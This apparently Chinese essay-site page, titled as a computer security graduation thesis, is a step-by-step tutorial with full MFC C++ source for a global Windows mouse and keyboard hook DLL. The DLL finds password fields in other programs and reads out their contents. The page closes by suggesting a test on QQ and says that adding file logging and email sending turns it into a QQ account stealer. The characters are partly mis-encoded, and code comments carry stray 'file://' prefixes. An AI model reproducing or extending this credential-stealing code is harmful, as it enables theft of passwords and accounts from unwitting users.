學(xué)習(xí)啦 > 論文大全 > 學(xué)科論文 > 計(jì)算機(jī)論文 > 計(jì)算機(jī)安全畢業(yè)論文:利用鼠標(biāo)鍵盤鉤子截獲密碼

計(jì)算機(jī)安全畢業(yè)論文:利用鼠標(biāo)鍵盤鉤子截獲密碼

時(shí)間: 謝樺657 分享

計(jì)算機(jī)安全畢業(yè)論文:利用鼠標(biāo)鍵盤鉤子截獲密碼

  鉤子(Hook),是Windows消息處理機(jī)制的一個(gè)平臺(tái),應(yīng)用程序可以在上面設(shè)置子程以監(jiān)視指定窗口的某種消息,而且所監(jiān)視的窗口可以是其他進(jìn)程所創(chuàng)建的。當(dāng)消息到達(dá)后,在目標(biāo)窗口處理函數(shù)之前處理它。鉤子機(jī)制允許應(yīng)用程序截獲處理window消息或特定事件。以下是學(xué)習(xí)啦小編今天為大家精心準(zhǔn)備的計(jì)算機(jī)安全畢業(yè)論文范文:利用鼠標(biāo)鍵盤鉤子截獲密碼。內(nèi)容僅供參考,歡迎閱讀!

  利用鼠標(biāo)鍵盤鉤子截獲密碼全文如下:

  鉤子能截獲系統(tǒng)并得理發(fā)送給其它應(yīng)用程序的消息,能完成一般程序無法完成的功能。掌握鉤子的編程方法是很有必要的

  鉤子分類 :

  1、WH_CALLWNDPROC和WH_CALLWNDPROCRET: 使你可以監(jiān)視發(fā)送到窗口過程的消息

  3、WH_DEBUG 調(diào)試鉤子

  4、WH_FOREGROUNDIDLE 當(dāng)當(dāng)應(yīng)用程序的前臺(tái)線程大概要變成空閑狀態(tài)時(shí),系統(tǒng)就會(huì)調(diào)用 WH_FOREGROUNDIDL

  5、WH_JOURNALRECORD 監(jiān)視和記錄輸入事件

  6、WH_JOURNALPLAYBACK 回放用WH_JOURNALRECORD記錄事件

  7、WH_KEYBOARD 鍵盤鉤子

  9、WH_KEYBOARD_LL 低層鍵盤鉤子

  10、WH_MOUSE 鼠標(biāo)鉤子

  11、WH_MOUSE_LL 底層鼠標(biāo)鉤子

  12、WH_SHELL 外殼鉤子

  13、WH_MSGFILTER 和 WH_SYSMSGFILTER 使我們可以監(jiān)視菜單,滾動(dòng)條,消息框等

  安裝鉤子:

  調(diào)用函數(shù)SetWindowsHookEx安裝鉤子。其函數(shù)原型為:

  HHOOK SetWindowsHookEx( int idHook,HOOKPROC lpfn, INSTANCE hMod,DWORD dwThreadId )

  idHook表示鉤子類型,它是和鉤子函數(shù)類型一一對(duì)應(yīng)的。如,WH_KEYBOARD,WH_MOUSE。

  Lpfn是鉤子函數(shù)的地址。

  HMod是鉤子函數(shù)所在的實(shí)例的句柄。對(duì)于線程鉤子,該參數(shù)為NULL;對(duì)于系統(tǒng)鉤子,該參數(shù)為鉤子函數(shù)所在的DLL句柄。 (系統(tǒng)鉤子必須在DLL中)

  dwThreadId 指定鉤子所監(jiān)視的線程的線程號(hào)。對(duì)于全局鉤子,該參數(shù)為NULL。

  SetWindowsHookEx返回所安裝的鉤子句柄。

  卸載鉤子

  調(diào)用函數(shù) BOOL UnhookWindowsHookEx( HHOOK hhk)卸載鉤子

  定義鉤子函數(shù)

  鉤子函數(shù)是一種特殊的回調(diào)函數(shù)。鉤子監(jiān)視的特定事件發(fā)生后,系統(tǒng)會(huì)調(diào)用鉤子函數(shù)進(jìn)行處理。一般為下:

  LRESULT WINAPI MyHookProc(int nCode ,WPARAM wParam,LPARAM lParam)

  參數(shù)wParam和 lParam包含所鉤消息的信息,比如鼠標(biāo)位置、狀態(tài),鍵盤按鍵等。nCode包含有關(guān)消息本身的信,比如是否從消息隊(duì)列中移出。

  實(shí)例:

  下面我們通過安裝鼠標(biāo)鉤子。和鍵盤鉤子還截獲輸入的密碼,并可查看*密碼為例,來說明何何使用鉤子。

  1,進(jìn)入向?qū)?,新建MFC AppWizard(dll) 取名為GetPass,選擇MFC Extension DLL,完成。

  2,新建一個(gè)CGetPassHook 類,基類:CObject,并加入StartHook,StopHook,函數(shù),如下:

  class AFX_EXT_CLASS CGetPassHook : public CObject

  {

  public:

  BOOL StopHook();

  BOOL StartHook(HWND hwnd);

  CGetPassHook();

  virtual ~CGetPassHook();

  };

  3:加入全局共享數(shù)據(jù),如下:

  #pragma data_seg("ShareData")

  HHOOK hKeyBoardHook=NULL; file://keyboar hook

  HHOOK hMouseHook=NULL; file://mouse hook

  HINSTANCE glhInstance=NULL; file://globle instance

  HWND hOutPutWnd=NULL; file://Display Pass Wnd

  #pragma data_seg()

  4:加入鼠標(biāo),鍵盤鉤子處理函數(shù),如下:

  LRESULT WINAPI MouseHookProc(int nCode,WPARAM wParam ,LPARAM lParam)

  { file://鼠標(biāo)鉤子得理函數(shù)

  LPMOUSEHOOKSTRUCT lpMouse=(MOUSEHOOKSTRUCT FAR*)lParam;

  if(nCode>=0)

  {

  HWND hTargetHwnd=lpMouse->hwnd; file://得到鼠標(biāo)所在窗口句柄

  if(hTargetHwnd)

  {

  LONG style=::GetWindowLong(hTargetHwnd,GWL_STYLE); file://得到它的樣式

  if(style&ES_PASSWORD) file://如果是密碼框

  {

  char szPass[255];

  ::SendMessage(hTargetHwnd,WM_GETTEXT,255,(LPARAM)szPass);

  file://得到密碼

  ::SendMessage(hOutPutWnd,WM_SETTEXT,0,(LPARAM)szPass);

  file://顯示密碼

  }

  }

  }

  return CallNextHookEx(hMouseHook,nCode,wParam,lParam);

  file://加上這句,就可以繼續(xù)傳遞消息,如果沒有,則會(huì)取消此消息的傳遞,

  file://可以起到截兒消息的目的,我們這里調(diào)用之。

  }

  LRESULT WINAPI KeyBoardProc(int nCode,WPARAM wParam,LPARAM lParam)

  { file://keyboard hook proc

  if(nCode>=0)

  {

  HWND hTargetHwnd=GetActiveWindow(); file://get active window

  if(hTargetHwnd)

  EnumChildWindows(hTargetHwnd,EnumWndProc,0); file://枚舉所有窗口

  }

  return CallNextHookEx(hKeyBoardHook,nCode,wParam,lParam);

  file://加上這句,就可以繼續(xù)傳遞消息,如果沒有,則會(huì)取消此消息的傳遞,

  file://可以起到截兒消息的目的,我們這里調(diào)用之。

  }

  這里要介紹下EnumChildWindows函數(shù),原形如下:

  BOOL EnumChildWindows(HWND hWndParent,WINDENUMPROC lpEnumFunc,LPARAM lParam);

  hWndParent:為枚舉窗口的句柄

  lpEnumFunc:枚舉函數(shù)的地址,

  lParam:這里為0

  5:加入枚舉窗口的函數(shù)。如下:(注意,因?yàn)榍懊娴暮瘮?shù)據(jù)要用到此函數(shù),所以要么在前面聲明,要么放在上面函數(shù)之前定義。

  BOOL WINAPI EnumWndProc(HWND hwnd,LPARAM lParam)

  { file://enum the child window,find passedit

  if(hwnd)

  {

  LONG style=::GetWindowLong(hwnd,GWL_STYLE); file://得到STYLE

  if(style&ES_PASSWORD) file://是密碼框

  {

  char szPass[255];

  ::SendMessage(hwnd,WM_GETTEXT,255,(LPARAM)szPass); file://得到PASS

  ::SendMessage(hOutPutWnd,WM_SETTEXT,0,(LPARAM)szPass); file://顯示

  return TRUE;

  }

  }

  return TRUE;

  }

  6:在DEF文件中定義段屬性: (這步很重要)

  SECTIONS

  mydata READ WRITE SHARED

  7:完成StartHook,StopHook函數(shù),啟動(dòng)/關(guān)閉鉤子,如下:

  BOOL CGetPassHook::StartHook(HWND hwnd)

  { file://install hoook

  hMouseHook=SetWindowsHookEx(WH_MOUSE,MouseHookProc,glhInstance,0);

  file://mouse hook

  hKeyBoardHook=SetWindowsHookEx(WH_KEYBOARD,KeyBoardProc,glhInstance,0);

  file://keyboard hook

  if(hMouseHook&&hKeyBoardHook)

  {

  hOutPutWnd=hwnd; file://顯示密碼的句柄

  return TRUE;

  }

  return FALSE;

  }

  BOOL CGetPassHook::StopHook()

  { file://unstall hook

  BOOL mHook=UnhookWindowsHookEx(hMouseHook);

  BOOL kHook=UnhookWindowsHookEx(hKeyBoardHook);

  if(mHook&&kHook)

  return TRUE;

  return FALSE;

  }

  8:在DLLMAIN函數(shù)中得到DLL句柄,要用到glhInstance變量,因此要加入一句,如下:

  extern HINSTANCE glhInstance; file://記得這里

  extern "C" int APIENTRY

  DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved)

  {

  UNREFERENCED_PARAMETER(lpReserved);

  if (dwReason == DLL_PROCESS_ATTACH)

  {

  TRACE0("GETPASS.DLL Initializing!n");

  if (!AfxInitExtensionModule(GetPassDLL, hInstance))

  return 0;

  new CDynLinkLibrary(GetPassDLL);

  glhInstance=hInstance; file://得到句柄

  }

  else if (dwReason == DLL_PROCESS_DETACH)

  {

  TRACE0("GETPASS.DLL Terminating!n");

  AfxTermExtensionModule(GetPassDLL);

  }

  return 1; // ok

  }

  9:編譯,完成DLL部分,

  下面建立APP部分。如下:

  1:新建MFC AppWizard(exe)命名為GetPassWord,并在第一步中選擇Add to Current WorkSpace加入到當(dāng)前工作區(qū),這樣方便。

  2:將剛才的DLL中的GetPass.lib,和GetPassHook.h拷貝APP所在目錄,然后Project->Add to Project-->Files

  選擇這兩個(gè)文件。

  2:在主對(duì)話框中,加入一個(gè)EDIT,ID 為IDC_EDIT_PASS

  3:在CGetPassWordDlg.h中包含GetPassHook.h文件,聲明一個(gè)對(duì)象。如下:

  #include "GetPassHook.h"

  class CGetPassWordDlg : public CDialog

  {

  protected:

  CGetPassHook m_hook;

  。。。

  DECLARE_MESSAGE_MAP()

  };

  4:在實(shí)現(xiàn)文件中:OnInitDialog()中起動(dòng)HOOK

  BOOL CGetPassWordDlg::OnInitDialog()

  {

  CWnd *pWnd=GetDlgItem(IDC_EDIT_PASS);

  m_hook.StartHook(pWnd->GetSafeHwnd()); file://install hook

  return TRUE; // return TRUE unless you set the focus to a control

  }

  5:加入WM_DESTROY消息,在退出程序時(shí)停止HOOK,如下:

  void CGetPassWordDlg::OnDestroy()

  {

  CDialog::OnDestroy();

  m_hook.StopHook(); file://stop hook

  }

  6:將GetPass.dll拷貝到。EXE一個(gè)目錄下,

  7:編譯,運(yùn)行.

  這樣,你在輸入任何密碼框輸入密碼時(shí),密碼都將截獲。就算鍵盤HOOK失效,移動(dòng)鼠標(biāo)到密碼框,也都獲取*號(hào)密碼,因?yàn)槲覀儼惭b兩個(gè)HOOK。啟動(dòng)QQ,輸入密碼,試下看是否已經(jīng)截獲了密碼?將本程序稍做修改,將截獲的密碼輸出到文件,并加入發(fā)送郵件攻能,一個(gè)QQ盜號(hào)器就做成了。

399530